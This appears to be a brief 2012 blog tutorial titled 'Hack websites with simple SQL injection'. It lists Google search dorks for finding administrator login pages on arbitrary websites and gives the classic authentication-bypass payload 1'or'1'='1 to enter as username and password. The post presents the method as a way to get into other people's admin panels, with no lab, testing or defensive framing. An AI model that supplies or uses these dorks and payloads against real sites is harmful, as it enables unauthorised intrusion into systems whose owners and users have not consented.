Thursday 29 March 2012

Hack websites with simple SQL injection





In this tutorial I will 
be showing you a very basic and simply SQLi (Structured Query Language Injection).I will show you how to get into a website by using some google dorks and SQL query. By using SQL queries we can bypass the username and password and can enter into the admin panel. To hack a website simply follow these steps :-


> Use any of the google dork to find the admin login page of a website.

inurl:admin.asp 
inurl:admin.php
intitle:admin
intitle:admin login
intitle:administrator
inurl:adminlogin.asp inurl:adminlogin.php
inurl:administrator


There are many websites which can be hacked by this. Open anyone and you will see the login page. Type this SQL query in form. 

Username : 1'or'1'='1
Password : 1'or'1'='1

1 comment: